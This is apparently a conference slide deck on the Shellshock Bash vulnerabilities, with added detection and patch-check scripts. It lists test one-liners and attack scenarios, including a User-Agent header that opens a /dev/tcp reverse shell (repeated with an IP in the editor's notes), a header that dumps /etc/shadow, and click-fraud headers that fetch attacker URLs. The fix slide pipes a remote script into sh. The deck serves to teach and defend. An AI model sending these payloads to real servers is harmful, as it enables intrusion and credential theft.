Sharath Unni 
@haxorhead 
http://hackabab.com/shellshock/
DISCOVERY 
Stéphane Chazelas discovered the bug on 12 September 2014, told a few, 
and publicly announced it on 24th Sept 
CVE-2014-6271 
By 25th Sept, botnets had sprung up performing DDoS. 
By 26th Sept, a botnet called "wopbot" was being used in a DDoS attack 
against Akamai Technologies and to scan the US DoD.
BACKGROUND 
Affects Bash up to version 4.3 Patch 26 
Analysis of the source code shows the bug existed as early as 1.13 in 1992 
Each program running under a Unix-like OS has access to a list of env 
variables. These are passed to new programs started by the parent. 
Bash maintains a list of functions, callable only from within Bash. 
Bash can exec itself, exporting env variables and func defs.
BACKGROUND 
Exported function defs begin with () in the new bash's env var list. 
The new bash reads the values in the env var list and converts them back to 
functions. 
This conversion is done by executing code from the value, creating the func 
on the fly. 
Vulnerable versions of bash do not check that the value contains only a func def. 
Passing a func def followed by code will cause the code to be called as well.
CVE-2014-6271 
First bug - Stéphane Chazelas 
env x='() { :;}; echo vulnerable' bash -c "date" 
Breakdown 
() { :; }; - Empty environment variable declaration 
/bin/bash -c - Call into Bash and pass a string with a command 
echo vulnerable – command that ideally should not be executed
CVE-2014-6277 
• Discovered by Michał Zalewski 
bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable
CVE-2014-7169 
Third bug – Tavis Ormandy 
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still 
allowed certain characters to be injected into other environments via 
specially crafted environment variables. 
env X='() { (a)=>\' bash -c "echo date"; cat echo ; rm -f echo
UNKNOWN CVE 
Fourth bug 
env -i X=' () { }; echo hello' bash -c 'date' 
Demo
ATTACK SCENARIOS 
Automated Click Fraud – Blackhat SEO 
Accept: () { :;}; /bin/bash -c "curl http://31.41.42[.]109/search/wphp/j.php?cgi=XXX" 
User-Agent: () { :;}; /bin/bash -c "wget -q -O /dev/null http://ad.dipad[.]biz/test/http://XXXXXX.com/"
ATTACK SCENARIOS 
/dev/tcp reverse shell 
GET /cgi-bin/ HTTP/1.1 
Host: x.x.x.x 
User-Agent: () { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/handler-ip/3333 0>&1'
ATTACK SCENARIOS 
Data theft 
GET /cgi-bin/status.cgi HTTP/1.0 
User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)
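
All three scenarios put a Bash function definition at the start of a request header value, which gives a simple detection point. The following is an added example, not part of the original slides: a heuristic filter (the name `find_funcdef_headers` and the sample request are constructed for illustration) that flags such headers and shows the text trailing the function body.

```shell
#!/bin/sh
# Added example (not from the slides): flag request headers whose value
# starts with a Bash function definition, and show what follows the body.

# Reads "Name: value" header lines on stdin. For every value that begins
# with "() {", prints "<header name><TAB><text after the function body>".
# Heuristic: the body is assumed to end at the first "}".
find_funcdef_headers() {
    awk '
    {
        sub(/\r$/, "")                          # tolerate CRLF line endings
        sep = index($0, ":")
        if (sep == 0) next                      # request line or blank line
        name  = substr($0, 1, sep - 1)
        value = substr($0, sep + 1)
        sub(/^[ \t]+/, "", value)
        if (value !~ /^\(\)[ \t]*\{/) next      # not an exported-function prefix
        close_at = index(value, "}")
        tail = (close_at > 0) ? substr(value, close_at + 1) : ""
        sub(/^[ \t;]+/, "", tail)               # drop the "; " after the body
        printf "%s\t%s\n", name, tail
    }'
}

# Constructed sample request; payloads are harmless echo probes.
sample_request() {
    cat <<'EOF'
GET /cgi-bin/status.cgi HTTP/1.0
Host: x.x.x.x
Accept: () { :; }; echo probe
Cookie: note=() { not at start
User-Agent: () { :;}; echo vulnerable
EOF
}

sample_request | find_funcdef_headers
```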
FIXES 
Patch 27 - https://ftp.gnu.org/gnu/bash/bash-4.3-patches/ 
curl https://shellshocker.net/fixbash | sh
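
After patching, the two environment-variable probes from the earlier slides can be re-run to confirm the fix took. This is an added example, not part of the original deck; the function names (`check_6271`, `check_7169`, `shellshock_report`) are made up for illustration, and the shell to test is given by name or absolute path.

```shell
#!/bin/sh
# Added example, not from the original slides. Re-runs the page's two
# environment-variable probes against a shell given by name or absolute path.

# Exit 0 if code placed after the function body runs (CVE-2014-6271).
check_6271() {
    # Equivalent to: env x='() { :;}; echo vulnerable' bash -c 'echo probe'
    out=$(x='() { :;}; echo vulnerable' "$1" -c 'echo probe' 2>/dev/null) || true
    case "$out" in
        *vulnerable*) return 0 ;;
        *) return 1 ;;
    esac
}

# Exit 0 if the parser leftover turns "echo date" into "date > echo"
# (CVE-2014-7169). Runs in a scratch directory so the stray file named
# "echo" never lands in the caller's working directory.
check_7169() {
    scratch=$(mktemp -d) || return 2
    ( cd "$scratch" && X='() { (a)=>\' "$1" -c 'echo date' ) >/dev/null 2>&1 || true
    if [ -e "$scratch/echo" ]; then rc=0; else rc=1; fi
    rm -rf "$scratch"
    return "$rc"
}

# Print one line per CVE: "CVE-2014-NNNN VULNERABLE" or "CVE-2014-NNNN ok".
shellshock_report() {
    command -v "$1" >/dev/null 2>&1 || { echo "not found: $1" >&2; return 2; }
    for cve in 6271 7169; do
        if "check_$cve" "$1"; then state=VULNERABLE; else state=ok; fi
        printf 'CVE-2014-%s %s\n' "$cve" "$state"
    done
}

shellshock_report "${1:-bash}"
```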
THANK YOU! 
@haxorhead 
http://www.hackabab.com/

The Shellshocker


Editor's Notes

  • #2 Reference: http://www.pcworld.com/article/2687763/safe-from-shellshock-how-to-protect-your-home-computer-from-the-bash-shell-bug.html
  • #6 env x='() { :;}; echo vulnerable' bash -c "date"
  • #7 env x='bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable'
  • #8 env X='() { (a)=>\' bash -c "echo date"; cat echo ; rm -f echo
  • #11 Reverse shell: User-Agent: () { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.133.160/3333 0>&1'
  • #12 Data theft: User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)
  • #13 Data theft: User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)